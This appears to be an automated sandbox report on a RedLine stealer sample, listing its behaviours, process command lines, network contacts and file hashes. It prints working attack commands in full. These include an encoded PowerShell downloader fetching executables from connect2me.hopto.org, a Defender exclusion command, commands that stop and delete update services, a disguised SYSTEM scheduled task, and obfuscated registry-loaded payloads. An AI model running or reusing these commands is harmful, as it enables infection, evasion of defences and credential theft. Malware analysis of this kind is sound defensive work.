Analysis Overview
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
Threat Level: Known bad
The file 1d678410484e34165adb652f7e86a2b5cae5f58d was found to be: Known bad.
Malicious Activity Summary
RedLine
Modifies security service
Suspicious use of NtCreateUserProcessOtherParentProcess
Suspicious use of NtCreateProcessExOtherParentProcess
RedLine payload
Blocklisted process makes network request
Stops running service(s)
Executes dropped EXE
Drops file in Drivers directory
Downloads MZ/PE file
Loads dropped DLL
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Program crash
Suspicious use of WriteProcessMemory
Checks processor information in registry
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-28 19:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-28 19:33
Reported
2023-01-28 19:36
Platform
win7-20220812-en
Max time kernel
71s
Max time network
46s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1264 created 420 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Stops running service(s)
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses the VBS compiler for execution
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1900 set thread context of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 1920 set thread context of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 1264 set thread context of 864 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 907cc3ec5733d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 48
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {D2F4B154-B34F-4D3B-A391-593E082648CF} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1959875407-12146705781331186516168542111652073145-519956228815563010-1410659623"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-187033790111701965561142526317-41152161-281305803148828164011928792981712477200"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2dc4ea7c-c7b0-4e43-8ff2-64385d0e7144}
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {FEBE4701-4209-46E0-B4FD-C8B231564A40} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
Files
memory/936-54-0x0000000000400000-0x0000000000405000-memory.dmp
memory/936-56-0x0000000000400000-0x0000000000405000-memory.dmp
memory/936-62-0x0000000000401159-mapping.dmp
memory/936-63-0x0000000075A81000-0x0000000075A83000-memory.dmp
memory/936-64-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1972-65-0x0000000000000000-mapping.dmp
memory/1444-66-0x0000000000000000-mapping.dmp
memory/1444-68-0x0000000073170000-0x000000007371B000-memory.dmp
\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/888-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/1612-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/888-77-0x0000000001280000-0x00000000013EC000-memory.dmp
\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/1824-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1920-83-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1444-85-0x0000000073170000-0x000000007371B000-memory.dmp
memory/888-86-0x0000000004DA0000-0x0000000004F06000-memory.dmp
memory/888-88-0x0000000005050000-0x000000000519E000-memory.dmp
memory/888-89-0x00000000004F0000-0x0000000000504000-memory.dmp
memory/1824-90-0x0000000001F10000-0x0000000002414000-memory.dmp
memory/1824-91-0x0000000001F10000-0x0000000002414000-memory.dmp
memory/1824-92-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/888-94-0x00000000011D6000-0x00000000011E7000-memory.dmp
memory/1824-95-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/836-96-0x000007FEFB9B1000-0x000007FEFB9B3000-memory.dmp
memory/836-97-0x000007FEF4010000-0x000007FEF4A33000-memory.dmp
memory/836-99-0x0000000002004000-0x0000000002007000-memory.dmp
memory/836-98-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp
memory/836-101-0x000000000200B000-0x000000000202A000-memory.dmp
memory/836-100-0x0000000002004000-0x0000000002007000-memory.dmp
memory/1476-102-0x0000000000000000-mapping.dmp
memory/2036-104-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f6ac30a716fb38a199acd68465d503fd |
| SHA1 | f00a7d0220f702a1a15dab76c1fee17caefd1c09 |
| SHA256 | a2a5189f4d8cf19f66bbbb5c3c6958bd18d47d1685fdddebc6cc9064639202ca |
